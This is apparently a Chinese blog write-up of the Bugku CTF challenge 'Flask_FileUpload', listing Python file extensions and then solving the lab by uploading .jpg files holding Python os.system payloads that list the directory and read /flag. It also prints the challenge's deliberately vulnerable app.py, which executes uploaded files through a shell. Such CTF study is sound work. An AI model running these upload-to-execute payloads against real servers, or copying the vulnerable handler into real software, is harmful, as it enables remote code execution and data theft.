Flask_FileUpload过关

已于 2022-06-28 18:38:59 修改
阅读量387 收藏 2
点赞数
分类专栏: 笔记
于 2022-06-11 17:29:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53150482/article/details/125236286
版权

Python 后缀名 Flask框架 SHELL函数 安全漏洞
关键词由CSDN通过智能技术生成

系列文章目录

开始打好基础非常重要的

文章目录

关于 Python 后缀名知识

总结:

  • .py : 通常编写的源代码的后缀
  • .py3 : Python3 脚本,不过也不常用
  • .pyc : 编译好的字节码,如果导入一个模块,python 将会生成一个 *.pyc 包含字节码的文件,以便再次导入他更容易,当然 .pyc 文件也可以使用 Easy Python Decompiler。 转换为 .py文件
  • .pyo : 这是在优化时创建的 *.pyc 文件,从 py3.5 开始,python 只适用 .pyc 而不是 .pyo
  • .pyd : 这基本是一个 windows DLL 文件
  • .pyi : MyPy 存根
  • .pyw : 使用 pythonw,exe 执行的 Windows 的 Python 脚本
  • .pyx : 将 Cython src 转换成 C/C++
  • .pyz : 这是一个包含标准Python脚本头之后的二进制形式的压缩 Python脚本(ZIP)的脚本
  • .py [cod]:.gitignore中的通配符表示该文件可能是.pyc,.pyo或.pyd。
  • .rpy:包含应用程序或框架特定功能的RPython脚本或Python脚本。
  • .pyde:处理使用的Python脚本。
  • .pyp:Py4D Python插件。
  • .pyt:Python声明文件。

提示:以下是本篇文章正文内容,下面案例可供参考

一、查看页面源代码

在这里插入图片描述
一般看到前端 js ,产生的第一个想法就是把 js 代码删除,万一没有后端验证呢
显然这道题没有显然这道题没有,修改请求中文件名字、MIME 类型都已经修改过了,没有用,但是源代码中提示到我们使用的是 python 代码,这时候我们可以使用 上传 python 代码的 jpg 文件

二、上传 Python 代码的文件

1.查看目录结构

上传一个 1.jpg 文件,内容如下

import os
print(os.system('ls ./'))

返回结果:
在这里插入图片描述

2.查看目录中的文件

查看 app.py

from flask import Flask, render_template, request, render_template_string
from werkzeug.utils import secure_filename
from subprocess import getoutput as shell
import os

// 在此出可看到一个 /flag 的名字
app = Flask(__name__) #在当前文件下创建应用
app.config['UPLOAD_FOLDER'] = 'upload/'  # app.config['UPLOAD_FOLDER']定义上传文件夹的路径
shell('echo $FLAG > /flag')  # 输出 flag

@app.route('/')
def upload_file():
    return render_template('index.html')


@app.route('/uploader', methods=['GET', 'POST'])
def uploader():
    if request.method == 'POST':
        abs_path = os.path.dirname(__file__)
        f = request.files['file']
        filename = f.filename
        if '.' in filename:
            prefix, suffix = filename.split('.')
            white_list = ['py3', 'jpg', 'png']
            if suffix in white_list:
                f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename)))
                try:
                    content = str(shell('python3 %s/upload/%s' % (abs_path, filename)))
                    if "%" in content:
                        content.replace('%', '')
                except Exception as e:
                    content = str(e)
                html = 'file uploaded successfully!<!-- %s -->' % str(content)
                return render_template_string(html)
            else:
                return "The file is not allowed to upload!"
        else:
            return "The file is not allowed to upload!"

    else:
        return "Method Not Allowed"


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80, debug=True)0

三、查看 flag

我们继续提交数据

import os
print(os.system('cat /flag'))

在这里插入图片描述
得到 flag

总结

借鉴的文章:
过关文章

  http://t.csdn.cn/yZuJx 	  
  http://t.csdn.cn/aEY4m

额外知识点:

Flask 框架
SHELL()函数

1qazcse
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask upload file
Hi_Panda
03-22 2942
import os from PIL import Image from flask import Flask, request, redirect, url_for from werkzeug import secure_filename from flaskext.uploads import (UploadSet, configure_uploads, IMAGES,
paddleOCR_flask_web服务化.rar
08-20
【标题】"paddleOCR_flask_web服务化.rar" 是一个使用PaddleOCR与Flask框架构建的Web服务项目,其主要目标是提供一个能够通过Web接口进行图像文字识别的服务。PaddleOCR是一款由阿里云开发的开源OCR(Optical ...
flask-file-upload:轻松上传Flask文件
02-05
Flask&SqlAlchemy一起使用的库可将文件存储在服务器上和数据库中 阅读文档: 安装 请安装最新的稳定版本: pip install flask-file-upload 常规Flask配置选项 (重要:在启动FileUpload之前,需要设置以下配置变量) # This is the directory that flask-file-upload saves files to. Make sure the UPLOAD_FOLDER is the same as Flasks's static_folder or a child. For example: ap
Flask_FileUpload
weixin_51646864的博客
09-03 2481
进入环境,查看源代码,看到只允许传jpg和png文件,并且会以python运行和返回结果。 直接创建一个a.jpg文件上传,内容为: import os os.system(‘cat /flag’) 接下来上传,burp抓包,看响应得到flag
Flask实现文件上传/下载【基础版】
zheshiyangyang的博客
05-19 1465
本文旨在记录学习“”,适合小白文件上传的方式有很多:“”、“”等等,本文主要介绍使用“所使用的注意我们使用表单时:“”这表明,因此需要使用该格式,如果。
【Web】-Flask_FileUpload
年轻的痞子的博客
05-24 417
一、打开场景 二、查看源码找线索 Tips:Give me the file, and I will return the Running results by python to you! 提示要上传文件(格式为:jpg或者png)Python运行后会返回结果 [解法一] 创建文本文件 然后更改格式,选择文件上传 上传后提示成功信息,并且返回了flag [解法二] ...
Python库 | Flask-FileUpload-0.4.0.tar.gz
03-05
from flask_fileupload import FileUpload app = Flask(__name__) file_upload = FileUpload(app, upload_folder='uploads', allowed_extensions=['txt', 'pdf']) @app.route('/upload', methods=['POST']) def ...
douban_flask_pythonflask豆瓣_python_
10-02
标题 "douban_flask_pythonflask豆瓣_python_" 暗示了这是一个使用 PythonFlask 框架来实现的项目,目标是爬取并处理豆瓣电影Top250的数据。Flask是一个轻量级的Web服务程序,适合用于构建小型到中型的Web应用。...
flask_pydantic:用于扩展真棒pydantic软件包的flask扩展
02-05
烧瓶-釜山 Flask扩展,用于将强大的与集成。安装python3 -m pip install Flask-Pydantic 基本validate装饰器验证查询和主体请求参数并使它们可通过两种方式访问​​:参数类型request属性名称询问query_params 身体...
Python库 | flask_unsign_wordlist-0.0.5-py2.py3-none-any.whl
03-19
**Pythonflask_unsign_wordlist 0.0.5版本详解** `flask_unsign_wordlist` 是一个针对Python后端开发库,专为Flask框架设计,用于处理签名URL的安全问题。该库主要功能是提供了一个工具集,帮助开发者在Flask...
BugKu:Flask_FileUpload
qq_44724114的博客
04-14 247
5.参考博客:https://blog.csdn.net/qq_47480932/
CTF-Bugku-WEB-Flask_FileUpload
最新发布
P5093的博客
06-07 855
个人学习记录笔记。
Bugku之Flask_FileUpload
金 帛的博客
05-06 1554
Bugku的WP
Flask 文件上传
xp5xp6的博客
02-09 859
一、文件上传html端[html] view plain copyform 属性设置:method="post" enctype="multipart/form-data"  input type="file"  二、server端文件接受 request.files['filename']返回一个类似文件对象,这个对象可以进行接受文件操作,save方法,以及文件对应的属性操作三、把文件保存在st...
BugKu-CTF(web篇)---Flask_FileUpload
Nailaoyyds的博客
03-07 3261
WEB题型 文件上传和远程代码执行 列出上传文件夹下的文件 两个文件夹和一个py文件 看一下app.py的内容 发现有一个/flag的文件 上传得到flag
bugku——Flask_FileUpload
yc20030119的博客
08-21 791
照例先检查一下源代码(显示文件只能通过jpg或者png进行上传,并且是用python进行返回)那条件都了解了,接下来就是写对应的文件了(我用笔记本写的相对应的文件)第一个文件上传结果为目录(惊奇的发现里面有flag文件)然后将文件的后缀名改成png结尾的文件。第二个文件(text1)然后将两个文件分别上传。第一个文件(text)
bugku flask_fileupload
06-06
如果我理解正确的话,您想知道有关 "bugku flask_fileupload" 的信息。"bugku" 可能是指 Bugku 平台,而 "flask_fileupload" 可能是指 Flask 框架中的文件上传功能。 如果您需要更具体的信息,请提供更多上下文或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值